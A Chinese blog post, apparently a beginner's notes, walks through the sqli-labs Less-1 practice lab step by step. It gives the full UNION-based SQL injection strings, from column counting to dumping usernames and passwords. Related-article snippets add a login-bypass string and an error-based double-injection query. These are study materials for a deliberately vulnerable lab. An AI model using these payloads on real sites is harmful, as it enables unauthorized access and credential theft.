sqli-lab Less-1 GET - Error based - Single quotes - String

最新推荐文章于 2022-10-31 20:54:18 发布
最新推荐文章于 2022-10-31 20:54:18 发布
阅读量214 收藏 3
点赞数
分类专栏: 阿了的sqli-lab学习笔记 文章标签: 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45987965/article/details/119520944
版权

sqli-lab Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

ctf小白的学习笔记。

1. 判断有多少列, 超出列数会报错

通过输入?id=1' order by 正整数 --+
在这里插入图片描述
说明有3列,即参数传递执行的查询有3个字段。
在这里插入图片描述
此处有一点搞不懂,输进去1、2、3,为什么就显示两个值呢?
查了资料发现,不是所有的查询都显示在网页前端的,为了确认能否返回前端,需要进行筛选(感觉这种方法有点像信号素)。
通过?id = -1' union select 1,2,3 --+
确认第二、三号位查询结果可返回。

2. 查询数据库名

?id=-1' union select 1,2,database() --+
在这里插入图片描述
database() ===>查询数据库名 ====>security

3. 查看数据库security

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
在这里插入图片描述
group_concat 可以将所有的tables 提取出来
information_schema是mysql特有的库,存储各种数据库的信息

4. 查询users表

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
在这里插入图片描述

5. 查询字段值

?id=-1' union select 1,2,group_concat(username) from security.users --+
用户名就出来了
在这里插入图片描述
?id=-1' union select 1,2,group_concat(password) from security.users --+
密码:
在这里插入图片描述
结束(END_ALliao)

阿了_NINE
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
GET-ERROR based-Single quotesString (GET型基于错误的单引号字符型注入) Less-1
water0diamond的博客
03-12 906
关于数据库的一些基础,会在前一篇提前准备篇中提到 首先打开网站首页,会发现如下界面:显示请输入id作为带数值的参数,那么下一步,我们就可以将参数传入试着提交然后看会有什么返回值。 使用get方式提交id参数,这样我们就可以得到返回值。可以看得到首页给出了用户名和密码。 然后再测id类型是否为字符串,用单引号测试,出现‘’’说明id为字符串类型 那么下面我们试着添加...
第三节 Sqli-lab环境搭建-01
09-15
第三节 Sqli-lab环境搭建-01
sqli-labs靶场1-10关
Cobra的博客
04-05 345
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 一、手工UNION联合查询注入 1、输入?id=1’发现报错,输入?id=1’-- -(-- -为注释符),页面回显正常,说明是单引号闭合注入。 2、爆数据库名 ?id=-1' union select 1,2,database() -- - (得到“security”数据库) 3、爆表名 ?id=-1' union select 1...
sqli-labs Basic Challenges Less-1
守卫者安全
03-23 228
Sqli-labs是一个练习sql注入非常nice的一个靶场,几乎涵盖了所有的注入类型。我们从今天就开始以这个靶场为基础学习sql注入吧。 靶场的安装十分简单,这里就不再过多阐述了。安装完成靶场的界面如下: 可以看到总共有4种不同难度的划分,先点击Basic Challengs看看最基础的。 基础注入一共有22关,让我们开心的学习起来吧。 ...
sqli-lab教程——1-35通关
缘木之鱼
05-08 5687
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges)Less-1 GET - Error...
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)
weixin_44368248的博客
04-14 577
1.根据图中的提示在url上加上?id=1 2.输入单引号,发现页面报错(通过在url中修改对应的id值。为正常数字、大数字、字符、(单引号、双引号、双单引号、括号)、反斜杆来探测url是否存在注入点) 由报错信息可知,可以通过单引号闭合 3.通过order by +数字来判断当前的字段数,输入order by 10报错,输入order by 5还报错,输入order by 3没有报错,在输入or...
sqli lab page1-lesson1[GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)]
m0_68980215的博客
06-28 164
sqlilab,page1-lesson1
sqli-labs练习(一)-------GET-Error based-Single quotes-String
wkend的博客
04-15 725
关于sqli-labs环境的搭建在这里不讲了,网上有很多, 初始页面 判断是否存在sql注入, 输入1,成功返回了结果 输入1',报错 输入1' and 1=1%23,返回成功, 输入1' and 1=2%23,没有返回结果 此外,除了and,还有or,+,-等,不过要注意的一点是+号在url表示为%2b,-号不用表示 根据以上结果,我们就可以判定这是字符型sq...
SQL注入攻击】GET-Error based-Single quotes with twist-String(基于错误的GET单引号变形字符型注入)
sm1918451478的博客
10-31 352
SQL注入攻击】GET-Error based-Single quotes with twist-String(基于错误的GET单引号变形字符型注入)
SQLi-Labs】Less-8 Blind- Boolian- Single Quotes- String
xw1995115的博客
11-17 3506
本节来练习一下布尔盲注。 有时候,对目标网站进行注入会有这样的情况,对于用户的输入,页面不会有报错提示,只会有两种结果: 1.目标页面有内容(证明用户的输入正确有效) 2.目标界面没有内容(证明用户的输入无效,或页面将要显示的不是开发者想要给用户看的内容) 总结一句话就是,在某些时候服务器只会反馈你“说”的对不对,也就是判断你的输入为“真”或者为“假”。 这时候就要用到布尔盲注来“猜”或者“骗”服务器说出“真话”。 多说无益,实战来叙。 1.在SQLi-Labs Less-8中,添加参数...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-lab通关txt
07-22
sqli-lab1~10的通关txt,其中包含了注入代码以及相关注解 代码由于存储在txt中,无法直接复制使用,请手打。 (可能是由于编码问题)
sqli-lab注入练习源码
06-25
本套源码是sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
sqli-labs:Less-1-Less-10
打代码的小女孩
11-17 690
less 1 ~less 10都是get型的 less 1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 我们得到了登陆名 Dumb 和密码 Dump。我们在URL上添加了一个参数,并让这个参数指向第一条记录。这是便生成了一个从浏览器到数据库的表中的一个快速的查询,从而来获取“id=1”的记录。同样,你可以构造查询...
sqli——labs初学者通关详
热门推荐
weixin_54072578的博客
10-19 1万+
Page-1 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) 我们先用HackBar写入id=1 发现id可以显示, 然后在后面加入单引号查看是存在注入http://127.0.0.1/sqli/Less-1/?id=1' 发现结果出现报错,那么存在注入。 那么我们就可以用 order by语句逐步判断其表格有几列。最后我们发现表格有三列 http://127.0.0.1/sqli/Less-1/?id=1'.
sqli-labs练习(十一)--- POST-Error Based-Single quotes-String
wkend的博客
07-25 332
一般看到这种需要登录的可能第一反应就是使用暴力破解,但是这里我们主要讨论的是sql注入,所以爆破就不在这里讲了。 发现需要登录,尝试使用万能密码登录, 万能密码的介绍:https://bbs.ichunqiu.com/thread-10851-1-1.html payload:username=admin' or 1=1#,password=任意输入, 登录成功,同时得到了一个账号的用...
SQLi-Labs】Less-5 GET - Double Injection - Single Quotes - String
xw1995115的博客
11-15 478
本节练习涉及到了一个新的概念:双注入。 双注入简单理解为一个select查询里嵌套一个select查询,如果要利用双注入需要人为构造特定的能够造成报错的查询,从而在报错信息里返回我们需要的数据。需要用到的函数和语句有: 1.concat() 作用为连接括号里的参数。例concat(1,~,2) 结果为 1~2 2.floor() 作用为对括号里的非整数进行取整 如1.9取为1,2.1取为2 3.count() 作用为针对查询结果条数进行计数 4.rand() 作用为生成0-1范围内的随机数...
sqli-labs练习(十四)--- POST-Double Injection-Single quotes-String-with twist
wkend的博客
07-26 426
这一关与上一关很相似,唯一的区别就在于是采用双引号来闭合的, 直接可以用万能密码成功登录,比如123" or 1=1# 在获取数据库信息是把')替换为"即可。 payload:uname=123" union select count(*),concat(':',(select database()),':',floor(rand()*2))as a from information_s...
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿了_NINE

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值